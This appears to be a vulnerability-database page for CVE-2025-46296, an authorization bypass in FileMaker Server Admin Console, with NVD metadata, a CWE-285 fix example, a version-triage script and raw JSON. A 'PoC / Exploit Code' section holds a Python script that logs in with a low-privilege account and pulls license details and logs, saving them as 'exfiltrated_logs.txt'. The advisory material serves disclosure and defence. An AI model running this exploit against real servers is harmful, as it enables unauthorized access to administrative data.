Security Vulnerability Report
CVE-2025-46296 CVSS 5.4 MEDIUM


Published: 2025-12-16 18:16:13
Last Modified: 2025-12-23 14:45:09

Description

An authorization bypass vulnerability in FileMaker Server Admin Console allowed administrator roles with minimal privileges to access administrative features such as viewing license details and downloading application logs. This vulnerability has been fully addressed in FileMaker Server 22.0.4.
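The weakness NVD assigns to this CVE is CWE-285 (Improper Authorization): the Admin Console distinguished authenticated administrator accounts from everyone else, but did not check what each administrator role was actually allowed to do. The example below is added here to show that pattern and its fix in code. It is not FileMaker Server code; the role names, permission names and paths are assumptions made for illustration.

```python
"""Added example: authenticated-but-unauthorized access (CWE-285) and its fix.

Models an admin console whose roles carry different permission sets.  The
vulnerable handler only confirms the caller is some authenticated admin role;
the fixed handler also checks the specific permission each feature requires.
Roles, permissions and paths are hypothetical, not FileMaker Server's own.
"""
from dataclasses import dataclass

# Assumed role -> permission mapping (illustrative only).
ROLE_PERMISSIONS = {
    "server_admin":   {"view_license", "download_logs", "manage_databases", "view_status"},
    "database_admin": {"manage_databases", "view_status"},
    "viewer":         {"view_status"},
}

# Assumed feature -> permission it requires (paths are illustrative).
FEATURE_PERMISSION = {
    "/admin/license":       "view_license",
    "/admin/logs/download": "download_logs",
    "/admin/databases":     "manage_databases",
    "/admin/status":        "view_status",
}


@dataclass
class Session:
    user: str
    role: str
    authenticated: bool = True


def _gate(session: Session, path: str):
    """Shared authentication and routing checks; returns an HTTP status or None."""
    if not session.authenticated or session.role not in ROLE_PERMISSIONS:
        return 401
    if path not in FEATURE_PERMISSION:
        return 404
    return None


def vulnerable_handle(session: Session, path: str) -> int:
    """CWE-285 pattern: once the caller holds any admin-console role, every
    feature is served.  Role granularity exists but is never consulted."""
    status = _gate(session, path)
    if status is not None:
        return status
    return 200  # BUG: no per-feature permission check


def fixed_handle(session: Session, path: str) -> int:
    """Fix: each feature names the permission it needs and the handler checks the
    caller's role against it, returning 403 for authenticated-but-unauthorized."""
    status = _gate(session, path)
    if status is not None:
        return status
    if FEATURE_PERMISSION[path] not in ROLE_PERMISSIONS[session.role]:
        return 403
    return 200


def audit(handler, role: str) -> dict:
    """Map every feature to the status the given role receives from handler."""
    session = Session(user="probe", role=role)
    return {path: handler(session, path) for path in FEATURE_PERMISSION}


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handle), ("fixed", fixed_handle)):
        print(f"{name:10s} viewer ->", audit(handler, "viewer"))
```

Running `audit` with the least-privileged role against both handlers is the regression test to keep: the vulnerable handler returns 200 for every feature, the fixed one returns 403 for license and log download and 200 only for status.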

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:* - VULNERABLE
FileMaker Server < 22.0.4
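The NVD configuration carries only an upper bound (versionEndExcluding 22.0.4), so every earlier release is in scope. The added example below (not from the page) evaluates an inventory of server versions against that node the way NVD's range semantics define it, and shows the string-comparison mistake that makes 22.0.10 look older than 22.0.4. The configuration values are the page's own; the version inventory is constructed for illustration.

```python
"""Added example: match installed versions against an NVD configuration node.

Walks the nodes/cpeMatch structure with its OR/AND/negate semantics and the
four optional range bounds, comparing versions numerically rather than as
strings.  The embedded configuration repeats the values shown on this page.
"""
import json
import re

# Constructed copy of the page's "configurations" field (same values).
NVD_CONFIG = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*",
   "versionEndExcluding": "22.0.4"}]}]}]
""")

PRODUCT = "cpe:2.3:a:claris:filemaker_server:"


def parse_version(v: str) -> tuple:
    """'22.0.4' -> (22, 0, 4).  Only leading digits of each component count;
    a suffix such as '-beta' is dropped."""
    parts = []
    for piece in v.split("."):
        m = re.match(r"\d+", piece)
        if m is None:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(parts)


def compare(a: str, b: str) -> int:
    """-1, 0 or 1; short versions are zero-padded so 22.0 == 22.0.0 and
    22.0.10 > 22.0.4."""
    ta, tb = parse_version(a), parse_version(b)
    n = max(len(ta), len(tb))
    ta += (0,) * (n - len(ta))
    tb += (0,) * (n - len(tb))
    return (ta > tb) - (ta < tb)


def matches(version: str, cpe_match: dict) -> bool:
    """Apply whichever of NVD's four range bounds a cpeMatch entry carries."""
    if not cpe_match.get("vulnerable", False):
        return False
    checks = (
        ("versionStartIncluding", lambda c: c >= 0),
        ("versionStartExcluding", lambda c: c > 0),
        ("versionEndIncluding",   lambda c: c <= 0),
        ("versionEndExcluding",   lambda c: c < 0),
    )
    for key, ok in checks:
        if key in cpe_match and not ok(compare(version, cpe_match[key])):
            return False
    return True


def is_vulnerable(config: list, cpe_prefix: str, version: str) -> bool:
    """True if any configuration node covering cpe_prefix includes version."""
    for cfg in config:
        for node in cfg["nodes"]:
            hits = [matches(version, m) for m in node["cpeMatch"]
                    if m["criteria"].startswith(cpe_prefix)]
            if not hits:
                continue
            result = any(hits) if node["operator"] == "OR" else all(hits)
            if node.get("negate"):
                result = not result
            if result:
                return True
    return False


def naive_string_check(version: str) -> bool:
    """The mistake to avoid: lexicographically '22.0.10' < '22.0.4' is True."""
    return version < "22.0.4"


def triage(versions: list) -> dict:
    """Map each version string to whether this CVE's configuration covers it."""
    return {v: is_vulnerable(NVD_CONFIG, PRODUCT, v) for v in versions}


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    for v, vuln in triage(["21.1.2", "22.0", "22.0.3", "22.0.4", "22.0.10"]).items():
        label = "VULNERABLE" if vuln else "fixed"
        print(f"{v:>8}: {label:10s} (naive string check says {naive_string_check(v)})")
```

Note that the Admin Console reports the server version to any logged-in administrator, so this check is also something a low-privilege operator can run without the elevated access the vulnerability itself concerns.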

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46296 PoC - FileMaker Server Admin Console Authorization Bypass
# Demonstrates calling admin-only functions (license details, log download)
# with a low-privilege Admin Console account.
#
# The endpoint paths below are the ones this PoC was published with; the vendor
# advisory referenced on this page does not list them, so confirm them against
# the target's Admin API before treating a non-200 response as "not vulnerable".
import requests
import urllib3

TARGET_URL = "https://target-server:16000"  # Admin Console port
USERNAME = "low_privilege_admin"
PASSWORD = "password"

# Admin Console instances commonly run with self-signed certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_auth_bypass():
    """Exploit authorization bypass in FileMaker Server Admin Console."""
    session = requests.Session()
    # Set verification on the session so every request tolerates the self-signed
    # cert, not only the login POST (passing verify=False once does not persist).
    session.verify = False

    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/fmi/admin/login"
    login_data = {"username": USERNAME, "password": PASSWORD}
    response = session.post(login_url, data=login_data, timeout=15)
    if response.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Successfully authenticated with low-privilege account")

    # Step 2: Access license details (requires higher privileges)
    license_url = f"{TARGET_URL}/fmi/admin/api/v1/license"
    license_response = session.get(license_url, timeout=15)
    if license_response.status_code == 200:
        print("[+] Authorization bypass successful - Retrieved license details")
        print(license_response.text)
    else:
        print(f"[-] Failed to access license details: {license_response.status_code}")

    # Step 3: Download application logs (requires higher privileges)
    logs_url = f"{TARGET_URL}/fmi/admin/api/v1/logs/download"
    logs_response = session.get(logs_url, timeout=15)
    if logs_response.status_code == 200:
        print("[+] Authorization bypass successful - Downloaded application logs")
        # Write the raw bytes: a log download may be an archive rather than text.
        with open("exfiltrated_logs.txt", "wb") as f:
            f.write(logs_response.content)
        print("[+] Logs saved to exfiltrated_logs.txt")
    else:
        print(f"[-] Failed to download logs: {logs_response.status_code}")


if __name__ == "__main__":
    exploit_auth_bypass()

Weakness

CWE-285 (Improper Authorization)

References

Vendor Advisory: https://support.claris.com/s/answerview?anum=000049056&language=en_US

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-46296",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T18:16:12.580",
    "lastModified": "2025-12-23T14:45:08.873",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An authorization bypass vulnerability in FileMaker Server Admin Console allowed administrator roles with minimal privileges to access administrative features such as viewing license details and downloading application logs. This vulnerability has been fully addressed in FileMaker Server 22.0.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-285"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "22.0.4",
                "matchCriteriaId": "72210F6C-78D0-449C-BD0A-A175305D1F3B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.claris.com/s/answerview?anum=000049056&language=en_US",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}